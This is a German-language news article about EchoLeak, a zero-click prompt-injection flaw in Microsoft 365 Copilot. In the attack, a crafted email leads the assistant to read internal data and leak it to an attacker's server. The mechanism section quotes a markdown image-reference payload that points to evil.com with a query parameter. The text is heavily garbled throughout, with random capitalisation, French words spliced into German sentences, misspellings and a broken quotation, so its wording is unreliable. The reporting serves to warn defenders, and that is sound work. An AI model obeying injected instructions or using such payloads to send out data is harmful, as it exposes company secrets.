Eine einzige e-mail kann copilot unmerkt dazu apport, sensible unternehmensdaten zu exfiltrieren – ohne klicks, ohne warnungen, ohne benutzeraktion.
Stellen Sie Sich Einen Anigriff Vor, Der So Heimlich ist, Dass Er Keine Klicks, Keine Téléchargements und Keine Warnungen Erfordert – Es Reicht Eine Einzelne E-Mail, Die in iHrem Postingang LanTet. Das ist der Fall Bei Echoleak, Einer Kritischen Sicherheitslücke dans Microsoft 365 Copilot. Sie ermöglicht es hackern, sensible unternehmensdaten zu Stehlen, ohne dass die opfer auch nur einen doigt rühren.
Die von Aim Security Entdeckte Schwachstelle ist Der erste dokuminierte zéro-clic-Angriff auf einen ki-agenten. „Eine Einzige Manipulierte e-Mail Reicht Aus. Copilot Verarbeitet SIE UNMEMERKT, FOLGT Versteckten Anweisungen, Durchsucht Interne Dateen und Versendet Vertrauliche Microsoft Umgeht”, Erklärenror SicherHeitssspezialisten dans Ihrem Blogbeitrag.
„Damit Wird Die Kernstärke der Ki, Ihr KontextVerständnis, Gegen Sich Selbst Instrumentaliserert”, Ergänzt Abhishek Anant Garg, analyste Bei der Qks Group. „Die Unternehmenssicherheit Hat Schwierigkeiten, Weil Sie für bösartigen Code Ausgelegt ist und nicht für eine sprache, die harlos aussieht, sich Aber wie eine waffe verhält. »
Nader Henein, analyste VP Bei Gartner Warnt: „Diese Art von Schwachstelle Stellt Eine Erhebliche Bedrohung Dar. Angesichts der Komplexität von ki-asistetenten und rag-Basierten Diensten wird dies sicherlich nicht der letzte Fall Sein, Densten wiir werden. »
Der Exploit-Mechanismus von Echoleak
Echoleak nutzt die fähigkeit von copilot, sowohl vertrauenswürdige interne daten (wie e-mails, équipes-chats undnedrive-dateien) als auch nicht vertrauenswürdige externe eingaben, wie eingehende e-Mails, zu verarbeiten. Der angriff beginnt mit einer bösartigen e-mail, die eine best -mmte markdown-syntax enthält, „wie! (Bild-alt-text) (ref) (ref): https://ww.evil.com?param=
Während copilot die e-mail automatisch im hintergrund scannt, um sich auf benutzeranfragen vorzubereiten, löst der ki-asistent eine browseranfrage aus, die sensible wie wie chat-verläufe, benutzerdaten oder interne dokumente an dai servel eine eines anngreifers Senlet.
Die Expoit-Kette Basiert auf Mehreren Schwachstellen, Darunter Eine Offnene Weiterleitung dans Der Content Security Policy (CSP) von Microsoft, Die Domänen von Teams Und SharePoint Vertraut. Dadurch Können Angreifer Bösartige Anfragen als Legiti Tarnen und die Abwehrmaßnahmen von Microsoft Gegen Cross-Prumpt-Injection-Angriffe (XPIA) Umgehen.
„ECHOLEAK Deckt Die Falsche Sicherheit von Schrittweisen Ki-einführungen auf“, SO DAS FAZIT der Spezialisten von der Qks Group. AIM Sécurité Stuft Diese Schwachstelle als „llm violation de la portée » Ein, bei der nicht vertrauenswürdige eingababeufforderungen die ki dazu manipulieren, auf daten außerhalb ihres vorgesehenen bereichs zuzugreifen.
„Angreifer können auf inhalte aus anderen teilen des llm-kontexts Verweisen, um Sensible Informationen Zu extrahieren und so die synthesefähigkeit der ki in einen vektor für die datenexfiltration zu verwandel“, fügt garg hinzu.
Die Forscher Fanden Darüber Hinaus ähnliche Schwachstellen, était Darauf Hindeutet, Dass Andere Ki-Systeme, Die Dieselbe Technologie Verwenden, Ebenfalls Gefährdet Sein Könnten. Microsoft Gab An, Die Sicherheitslücke Behoben Zu Haben, und Beteuerte, Dass Keine Kunden Betroffen Waren und es Keine Tatsächlichen anigriffe Gegeben Habe.
Echos über Microsoft Hinaus
„ECHOLEAK Markierert Einen Wandel Hin Zu Architekturen, Die von Einer Kompromittierung Ausgehen”, Betont der Qks Group-Experte. „Unternehmen Müssen Nun Damit Rechnen, Dass Feindliche Invite-Injektionen Auftreten Werden, Sodass Eine Echtzeit-Verhaltensüberwachung und Aletenbezogène Bedrohungsmodellierung Zu existenziellen anforderUngen werden. »
Da Ki Aus Dem Arbeitsalltag Nicht Mehr Wegzudenken ist, Analystage Fordern Eine Robuste Eingabevalidieung und Datenisolierung. Gartner-Analyst Henein Warnte, Dass Gezielte Antriffe wie „Das Versenden Einer e-mail un einen cfo, um verdiestangaben vor der ver Veröffentlichung zu Stehlen« Besonders besorgniserregend Sind.
Jedes Ki-System, Das Auf Retrieval-Augmentation Generation (RAG) Basiert, Könte Gefährdet Sein, Wenn es externe Eingaben Zusammen Mit Sensiblen Internen Verarbeitet. Laut Garg Könnten Herkömmliche Abwehrmaßnahmen wie dlp-tags solche angriffe oft nicht verhindern. «Zudem Beeintächtigen Sie Möglicherwerweise die funktionalität von copilot, Wenn Sie Aktivit Sind», Fügt er Hinzu.
„Die Schwachstelle Beweist, Dass Herkömmliche Perimeter Beduutungslos Sind, Wenn Ki Manipulert Werden Kann, Um Durch Scheinbar Harmlose Eingaben Grenzen Zu überschreiten”, mahnt der Qks-group-analyst.
Für Branchen Wie das Bankwesen, Die Gesundheitsbranche und die verteidigung können diese produktivitätswerkzeuge gleichzeitig als Leistungsstarke exfiltrationsMechanismen Dienen. „CIOS Müssen Ki-Systeme Jetzt Unter der Annahme Einer Feindlichen Autonomie Entwickeln“, Fordert Garg. „Jeder Agent ist eine potenzielle datenleckquelle und muss vor der produktion einer red-team-Validieung Unterzogen werden. »
Ki-Sicherheit Neu Denken
Echoleak Zeigt, Dass Ki Für Unternehmen Nicht Immun Gegen Kompromittierung ist und dass es bei ihrer Sicherung Nicht Nur Darum Geht, Lücken Zu Stopfen. „Ki-agenten erfordern ein nees schutzparadigma”, Betont der Qks-groupe-groupe. «Laufzeitsicherheit muss der Mindeststandard Sein.»
Die Schwachstelle Offenbart Auch Tiefergehende Strukturelle Problème dans Der Modernen Ki. „Agent Ki Leidet Unter Einem Kontextkollaps”, Führt Garg Aus. „SIE VERMISCHT DATEN AUS Verschiedenen Sicherheitsdomänen und Kann Nicht Unterscheiden, Worauf Sie Zugreifen Kann und Worauf Sie Zugreifen Sollte, Wodurch Diese Synthese Zu Einer Privilegienausweitung Führt.
Angesichts der Wachsenden angriffsfläche von ki beweist echoleak, dass selbst die ausgefeiltesten systeme durch ausnutzung der ki-eigenen logik als waffe einsesetzt werden können. «Vorerst», So Garg Abschließend, „Sollten Cisos Ganz Genau Hinschauen und Besser Zweimal überlegen, Bevor Sie der Ki Zugriff auf ihren Postingang Gewähren. (JM)
Lesenipp: la liste de contrôle Genai-Security ALS



